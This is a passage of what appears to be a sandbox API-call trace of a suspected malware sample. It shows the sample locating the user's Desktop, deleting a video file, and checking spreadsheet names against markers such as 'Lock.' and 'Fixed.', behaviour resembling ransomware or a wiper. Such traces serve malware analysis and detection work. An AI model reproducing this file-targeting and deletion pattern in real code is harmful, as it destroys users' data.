(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.163] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.163] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.164] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24202f0 [0190.166] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/wI0b0QZdP-KcsT.avi", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wI0b0QZdP-KcsT.avi", lpFilePart=0x8bedfc*="wI0b0QZdP-KcsT.avi") returned 0x38 [0190.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0190.166] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wI0b0QZdP-KcsT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wi0b0qzdp-kcst.avi")) returned 0x20 [0190.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wI0b0QZdP-KcsT.avi", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea707560, ftCreationTime.dwHighDateTime=0x1d4c740, ftLastAccessTime.dwLowDateTime=0x69275000, ftLastAccessTime.dwHighDateTime=0x1d4ca9c, ftLastWriteTime.dwLowDateTime=0x69275000, ftLastWriteTime.dwHighDateTime=0x1d4ca9c, nFileSizeHigh=0x0, nFileSizeLow=0xd2af, dwReserved0=0x85, dwReserved1=0x4, cFileName="wI0b0QZdP-KcsT.avi", cAlternateFileName="WI0B0Q~1.AVI")) returned 0xaa5860 [0190.166] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wI0b0QZdP-KcsT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wi0b0qzdp-kcst.avi")) returned 1 [0190.167] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea707560, ftCreationTime.dwHighDateTime=0x1d4c740, ftLastAccessTime.dwLowDateTime=0x69275000, ftLastAccessTime.dwHighDateTime=0x1d4ca9c, ftLastWriteTime.dwLowDateTime=0x69275000, ftLastWriteTime.dwHighDateTime=0x1d4ca9c, nFileSizeHigh=0x0, nFileSizeLow=0xd2af, dwReserved0=0x85, dwReserved1=0x4, cFileName="wI0b0QZdP-KcsT.avi", cAlternateFileName="WI0B0Q~1.AVI")) returned 0 [0190.167] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0190.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.168] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.168] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0190.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.169] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24202f0 [0190.177] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/wI0b0QZdP-KcsT.avi", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wI0b0QZdP-KcsT.avi", lpFilePart=0x8bf658*="wI0b0QZdP-KcsT.avi") returned 0x38 [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0190.177] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wI0b0QZdP-KcsT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wi0b0qzdp-kcst.avi")) returned 0xffffffff [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.177] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0190.177] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.177] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YItI7wiYOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ItI7wiYOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tI7wiYOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I7wiYOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7wiYOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wiYOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iYOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YOV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OV-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.179] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YItI7wiYOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ItI7wiYOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tI7wiYOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I7wiYOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7wiYOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wiYOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iYOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YOV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OV-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.180] PeekMessageW (in: 